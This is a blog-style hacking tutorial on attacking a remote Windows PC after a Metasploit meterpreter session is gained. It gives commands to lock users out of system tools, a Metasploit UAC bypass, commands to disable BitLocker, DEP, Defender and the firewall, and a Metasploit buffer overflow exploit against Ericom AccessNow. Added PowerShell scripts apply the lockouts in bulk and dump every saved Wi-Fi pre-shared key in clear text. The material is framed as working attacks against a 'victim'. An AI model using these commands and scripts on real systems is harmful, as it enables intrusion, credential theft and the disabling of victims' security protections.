Best of Remote Windows PC Hacking Tricks (Part 1)

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you have a meterpreter session, run the 'shell' command to get a command prompt on the target. Every REG command below is typed into that prompt, so it runs as the user whose process you are sitting in: the HKCU entries affect only that account, and the HKLM entries fail with "Access is denied" unless the session is already elevated.

How to Disable and Enable services.msc

The GUID is the Services MMC snap-in. Restrict_Run = 1 under HKCU blocks that snap-in for the current user only, so services.msc refuses to open for them while other accounts on the machine are unaffected (and the sc and net commands still work from the command line).

REG add "HKCU\Software\Policies\Microsoft\MMC\{58221C66-EA27-11CF-ADCF-00AA00A80033}" /v Restrict_Run /t REG_DWORD /d 1 /f

To Enable services.msc

REG add "HKCU\Software\Policies\Microsoft\MMC\{58221C66-EA27-11CF-ADCF-00AA00A80033}" /v Restrict_Run /t REG_DWORD /d 0 /f


How to Disable and Enable Internet Options

This one lives under HKLM, so it needs an elevated shell; the same value under HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions applies to the current user only and needs no admin rights.

REG add "HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v NoBrowserOptions /t REG_DWORD /d 1 /f

To Enable Internet Options:

REG add "HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v NoBrowserOptions /t REG_DWORD /d 0 /f


How to Disable and Enable Folder Options

Also an HKLM policy (elevated shell required). Explorer reads it when a new window opens, so an Explorer window that is already open keeps its menu until it is closed.

REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

To Enable Folder Options:

REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 0 /f


How to Disable and Enable Security tab

NoSecurityTab removes the Security tab from file and folder Properties dialogs for the current user, so they can no longer view or edit ACLs in the GUI; icacls and cacls on the command line are not affected.

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSecurityTab /t REG_DWORD /d 1 /f

To Enable Security tab

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSecurityTab /t REG_DWORD /d 0 /f


How to Disable and Enable Group Policy

Same mechanism as services.msc above; this GUID is the Group Policy Object Editor snap-in, so gpedit.msc stops loading for the current user.

REG add "HKCU\Software\Policies\Microsoft\MMC\{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /t REG_DWORD /d 1 /f

To Enable Group Policy

REG add "HKCU\Software\Policies\Microsoft\MMC\{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /t REG_DWORD /d 0 /f


How to Disable and Enable Task Manager

This takes effect immediately: Ctrl+Shift+Esc and the Task Manager item on the Ctrl+Alt+Del screen are both blocked with a message that Task Manager has been disabled by the administrator. tasklist and taskkill still work.

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

To Enable Task Manager

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f


How to Disable Registry Editor

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

This blocks regedit.exe for the current user but not reg.exe, so the same REG add line with /d 0 (or deleting the value) re-enables it from the shell you are already in.
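The seven REG add lines above are one idea applied seven times. The script below is an added example, not part of the original post: it puts the same registry paths in a table and can audit, apply or revert all of them in one go, reading each value back after writing it so you see which ones actually took. The $Policies table is built from the paths on this page; the function and parameter names (Get-PolicyState, Set-PolicyState, -Data) and the upload path in the comment are my own choices. Upload it with meterpreter and run it from the 'shell' prompt with powershell -ExecutionPolicy Bypass -File.

```powershell
# Added example, not part of the original post: apply, audit or revert the seven
# UI lockouts above from one script instead of seven REG add lines.
# The policy table is taken from the registry paths on this page; the function and
# parameter names ($Policies, Get-PolicyState, Set-PolicyState, -Data) are my own.
# Run from the meterpreter 'shell' prompt after uploading the file, e.g.:
#   powershell -ExecutionPolicy Bypass -File C:\Users\Public\policy.ps1
# HKLM entries only succeed from an elevated shell; HKCU entries affect
# only the account you are running as.

$Policies = @(
    @{ Feature = 'services.msc';     Path = 'HKCU:\Software\Policies\Microsoft\MMC\{58221C66-EA27-11CF-ADCF-00AA00A80033}'; Name = 'Restrict_Run' }
    @{ Feature = 'gpedit.msc';       Path = 'HKCU:\Software\Policies\Microsoft\MMC\{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}'; Name = 'Restrict_Run' }
    @{ Feature = 'Internet Options'; Path = 'HKLM:\Software\Policies\Microsoft\Internet Explorer\Restrictions';             Name = 'NoBrowserOptions' }
    @{ Feature = 'Folder Options';   Path = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer';            Name = 'NoFolderOptions' }
    @{ Feature = 'Security tab';     Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer';            Name = 'NoSecurityTab' }
    @{ Feature = 'Task Manager';     Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System';              Name = 'DisableTaskMgr' }
    @{ Feature = 'regedit.exe';      Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System';              Name = 'DisableRegistryTools' }
)

function Get-PolicyState {
    # Read each value back. A missing key or value means "not restricted".
    foreach ($p in $Policies) {
        $val = $null
        if (Test-Path $p.Path) {
            $val = (Get-ItemProperty -Path $p.Path -Name $p.Name -ErrorAction SilentlyContinue).($p.Name)
        }
        New-Object PSObject -Property @{
            Feature    = $p.Feature
            Name       = $p.Name
            Value      = $val
            Restricted = ($val -eq 1)
        }
    }
}

function Set-PolicyState {
    # -Data 1 disables the feature, 0 re-enables it, exactly like the REG add lines.
    param([Parameter(Mandatory = $true)][ValidateSet(0, 1)][int]$Data)
    foreach ($p in $Policies) {
        try {
            if (-not (Test-Path $p.Path)) { New-Item -Path $p.Path -Force -ErrorAction Stop | Out-Null }
            Set-ItemProperty -Path $p.Path -Name $p.Name -Value $Data -Type DWord -ErrorAction Stop
            # Verify by reading back rather than trusting the write
            $check = (Get-ItemProperty -Path $p.Path -Name $p.Name).($p.Name)
            '{0,-17} {1,-21} = {2}' -f $p.Feature, $p.Name, $check
        } catch {
            # Usual cause: writing to HKLM from a non-elevated shell
            '{0,-17} FAILED: {1}' -f $p.Feature, $_.Exception.Message
        }
    }
}

# Default action is the audit; uncomment one of the two lines to change state.
Get-PolicyState | Format-Table Feature, Name, Value, Restricted -AutoSize
# Set-PolicyState -Data 1    # lock everything out
# Set-PolicyState -Data 0    # restore
```

Because the script reads every value back, the audit is also the quickest way for a defender (or a tester cleaning up) to confirm that all seven lockouts are gone: every row should show Restricted = False once the restore has run.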

Hack ALL Security Features in Remote Windows 7 PC

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Prerequisite: a meterpreter session on the victim (see the Metasploit tutorial above). The commands in this section change machine-wide settings, so the session has to be elevated first; that is what the UAC bypass below is for.

How to Bypass UAC (Get an Elevated Session)
From Microsoft: UAC is a security component that allows an administrator to enter credentials during a non-administrator's user session to perform occasional administrative tasks. UAC can also require administrators to specifically approve administrative actions or applications before they are allowed to run. A member of the Administrators group therefore runs with a filtered, medium-integrity token until something is approved, and the module below gets past that approval without showing the prompt.

use exploit/windows/local/bypassuac_injection
msf exploit(bypassuac_injection) > set session 1
msf exploit(bypassuac_injection) > set lhost 192.168.1.6 (IP of Local Host)
msf exploit(bypassuac_injection) > exploit

The module only works when the user behind session 1 is a member of the local Administrators group and UAC is at its default level; it is not a bypass for "Always notify", and it does nothing for a standard user. On success it returns a second, elevated meterpreter session. Interact with that one (sessions -i <id>) and run 'shell' there, because everything that follows (manage-bde, bcdedit, net stop, netsh) needs administrator rights and fails with "Access is denied" from the original session.

How to Check Status and Disable BitLocker
BitLocker Drive Encryption encrypts the whole Windows operating system volume (and any configured data volumes) and can seal the volume key to a Trusted Platform Module, so the disk is unreadable when removed from the machine.

manage-bde -status C: (look at the Protection Status and Conversion Status lines; if protection is on, use the following command)

manage-bde -off C:

manage-bde -off starts a full decryption of the volume. It runs in the background and can take hours on a large disk, the progress shows in manage-bde -status and in the BitLocker control panel, and the disk is only fully exposed once Percentage Encrypted reaches 0%. Both commands need the elevated shell.


How to Turn Off Data Execution Prevention (DEP)
From Microsoft: Data Execution Prevention (DEP) is a security feature that can help prevent damage to your computer from viruses and other security threats. Harmful programs can try to attack Windows by attempting to run (also known as execute) code from system memory locations reserved for Windows and other authorized programs. These types of attacks can harm your programs and files.

bcdedit.exe /set {current} nx AlwaysOff

bcdedit needs the elevated shell and the change is written to the boot configuration, so it only applies after the next reboot. The client default is OptIn; setting that value back with the same command undoes the change.


How to Stop the Windows Defender Service
On Windows 7, Windows Defender is the built-in anti-spyware component only (not a full antivirus), and it is often already turned off where Microsoft Security Essentials or a third-party product is installed.

net stop WinDefend

This needs the elevated shell, and it only stops the service for the current boot: unless the startup type is also changed (sc config), it comes back the next time the machine starts.


How to Disable Windows Firewall
Windows Firewall can help protect your PC from hackers and malicious software. In Windows 7:

netsh firewall set opmode disable

netsh firewall is the old Windows XP syntax; Windows 7 still accepts it (and prints a deprecation notice), but the current syntax is netsh advfirewall, which can also turn off individual profiles. Either way an elevated shell is required, and the Action Center flags the firewall as off for the logged-on user.
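Every change in this section is easy to get wrong silently (a non-elevated shell, a pending reboot, a service that restarts at boot). The script below is an added example, not part of the original post: a read-only check of each feature touched above, to run before and after the changes from either side of an engagement. The function name is my own; it reads the UAC policy values from the registry, asks WMI for the DEP policy and the Defender service, and parses the English text output of manage-bde and netsh advfirewall, so the patterns need adjusting on a localised Windows.

```powershell
# Added example, not part of the original post: a read-only check of every
# feature touched in this section. Run it before and after the changes (from
# either side of the engagement) to confirm what actually changed. The function
# name is my own; it shells out to manage-bde and netsh and parses their English
# output, so adjust the patterns on a localised Windows.

function Get-Win7SecurityState {
    $state = @{}

    # UAC. EnableLUA = 0 turns UAC off altogether; ConsentPromptBehaviorAdmin = 5 is the
    # Windows 7 default that bypassuac_injection expects, 0 elevates admins silently.
    $sys = Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System'
    $state['UAC.EnableLUA']                  = $sys.EnableLUA
    $state['UAC.ConsentPromptBehaviorAdmin'] = $sys.ConsentPromptBehaviorAdmin

    # Is this shell already running with an elevated token? (what a UAC bypass is for)
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal -ArgumentList $id
    $state['Shell.Elevated'] = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

    # BitLocker on C:. manage-bde prints "Protection Status: Protection On|Off" and a
    # "Conversion Status" line; manage-bde itself needs an elevated shell.
    $bde = & manage-bde -status C: 2>&1 | Out-String
    $state['BitLocker.C.Protection'] = if ($bde -match 'Protection Status:\s*(.+)') { $matches[1].Trim() } else { 'unknown (manage-bde failed)' }
    $state['BitLocker.C.Conversion'] = if ($bde -match 'Conversion Status:\s*(.+)') { $matches[1].Trim() } else { 'unknown' }

    # DEP policy as WMI reports it: 0 = AlwaysOff, 1 = AlwaysOn, 2 = OptIn (client default), 3 = OptOut.
    # This is the policy in effect now; a pending bcdedit change only shows after the reboot.
    $depNames = @{ 0 = 'AlwaysOff'; 1 = 'AlwaysOn'; 2 = 'OptIn'; 3 = 'OptOut' }
    $dep = (Get-WmiObject Win32_OperatingSystem).DataExecutionPrevention_SupportPolicy
    $state['DEP.Policy'] = if ($dep -ne $null) { $depNames[[int]$dep] } else { 'unknown' }

    # Windows Defender service: current state plus startup type (a Stopped service
    # whose StartMode is still Auto simply comes back at next boot).
    $svc = Get-WmiObject Win32_Service -Filter "Name='WinDefend'"
    $state['Defender.Service'] = if ($svc) { '{0}, startup {1}' -f $svc.State, $svc.StartMode } else { 'not installed' }

    # Firewall per profile. netsh advfirewall is the Vista+ syntax; the page's
    # netsh firewall is the deprecated XP syntax, still accepted on Windows 7.
    $profile = 'Unknown'
    foreach ($line in (& netsh advfirewall show allprofiles state)) {
        if ($line -match '^(\w+) Profile Settings') { $profile = $matches[1] }
        elseif ($line -match '^State\s+(\w+)')      { $state["Firewall.$profile"] = $matches[1] }
    }
    return $state
}

$s = Get-Win7SecurityState
$s.GetEnumerator() | Sort-Object Name | Format-Table Name, Value -AutoSize
```

Run it once from the original session and once from the elevated one: Shell.Elevated flips to True after the bypass, and the BitLocker lines go from "unknown (manage-bde failed)" to real values, which is a quick way to prove the elevation worked before touching anything.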

How to Shutdown, Restart, Logoff, and Hibernate Remote Windows PC

Prerequisite: a meterpreter session on the victim (see the Metasploit tutorial above); run 'shell' to get a command prompt. shutdown.exe accepts either - or / in front of its switches.

Shutdown Remote PC

Shutdown.exe -s

Without a timeout, shutdown.exe waits 30 seconds and shows a countdown dialog on the victim's desktop, and it will not close applications that have unsaved work. Adding /t 0 /f shuts down at once and forces applications closed; either way the logged-on user sees it happen.

Restart Remote PC

Shutdown.exe -r

Logoff Remote PC

Shutdown.exe -l

Logoff ends only the logon session the command runs in and cannot be combined with a timeout.

Hibernate Remote PC

Shutdown.exe /h

Hibernate works only if hibernation is enabled on the machine (powercfg); otherwise the command errors out. All four commands end the processes of the current logon session, which includes your payload, so the meterpreter session is lost unless you have set up persistence that survives a reboot or a new logon.


Hack WIFI Setting of Remote Windows PC

Prerequisite: a meterpreter session on the victim (see the Metasploit tutorial above); run 'shell' to get a command prompt. All of the commands below go through the WLAN AutoConfig service, so they need a wireless adapter in the machine; on a wired-only PC netsh reports that there is no wireless interface on the system.

Detect the list of available Wireless Networks

netsh wlan show networks mode=bssid

mode=bssid adds each access point's BSSID, signal strength, channel and authentication type to the SSID list, which is enough to map the networks the victim can see from where it sits.



How to list the Wireless Network profiles saved on the PC

netsh wlan show profile


How to show the installed Wireless drivers

netsh wlan show drivers


How to disconnect from the current Wireless Network

netsh wlan disconnect


Other Commands

Connect to a saved Wireless Network (quote the profile name if it contains spaces)
netsh wlan connect name="profile name"
Save a wlan profile to an XML file
netsh wlan export profile name="profile name"
Adding key=clear to the export writes the network's pre-shared key into the XML in plain text, and key=clear on netsh wlan show profile prints it on screen as "Key Content"; this is the most valuable thing in the whole section, because the PSK usually reaches well beyond the one PC.
Show the blocked networks
netsh wlan show blockednetworks
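Pulling the keys one profile at a time is tedious, and the profile list and the key are in two different commands. The script below is an added example, not part of the original post: it enumerates every saved profile with netsh wlan show profiles, runs netsh wlan show profile name=... key=clear for each, and extracts the authentication type and the Key Content line. The function name is my own; the regexes match netsh's English output, and on some builds the key line is only printed from an elevated shell, in which case the Key column shows "(not shown)".

```powershell
# Added example, not part of the original post: list every saved WLAN profile
# and pull the authentication type and pre-shared key out of
# "netsh wlan show profile name=<x> key=clear". Function name is my own; the
# patterns match netsh's English output, so adjust them on a localised Windows.

function Get-SavedWlanKeys {
    # "All User Profile     : HomeNet" (or "Current User Profile") lines list the stored profiles
    $names = & netsh wlan show profiles | Where-Object { $_ -match '(?:All User|Current User) Profile\s*:\s*(.+)$' } | ForEach-Object { $matches[1].Trim() }

    foreach ($n in $names) {
        # key=clear prints "Key Content : <psk>" for WPA/WPA2-Personal profiles.
        # On some builds this needs an elevated shell; without it the line is simply absent.
        $out  = & netsh wlan show profile name="$n" key=clear | Out-String
        $auth = if ($out -match 'Authentication\s*:\s*(.+)') { $matches[1].Trim() } else { '?' }
        $key  = if ($out -match 'Key Content\s*:\s*(.+)')    { $matches[1].Trim() } else { '(not shown)' }
        New-Object PSObject -Property @{ Profile = $n; Authentication = $auth; Key = $key }
    }
}

Get-SavedWlanKeys | Format-Table Profile, Authentication, Key -AutoSize
```

Profiles that use 802.1X/EAP have no Key Content line at all, which is why the Authentication column is there: an "(not shown)" next to WPA2-Enterprise is expected, while the same next to WPA2-Personal means the shell was not elevated.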

Hack Remote Windows PC using Ericom AccessNow Server Buffer Overflow

This module exploits a stack-based buffer overflow in Ericom AccessNow Server. The vulnerability is due to an insecure use of vsprintf with user-controlled data, which can be triggered with a malformed HTTP request. This module has been tested successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003 Server SP2.

Exploit Targets
Ericom AccessNow Server 2.4.0.2

Requirement
Attacker: kali Linux
Victim PC: Windows XP SP 3

Open a Kali terminal, type msfconsole, and then:

use exploit/windows/http/ericom_access_now_bof
msf exploit(ericom_access_now_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(ericom_access_now_bof) > set lhost 192.168.1.8 (IP of Local Host)
msf exploit(ericom_access_now_bof) > set rhost 192.168.1.2 (IP of Remote PC)
msf exploit(ericom_access_now_bof) > exploit

If the AccessNow web service is not listening on the module's default port, set rport as well (show options lists it). A successful run returns a meterpreter session from the server, after which the same 'shell' tricks from the earlier sections apply.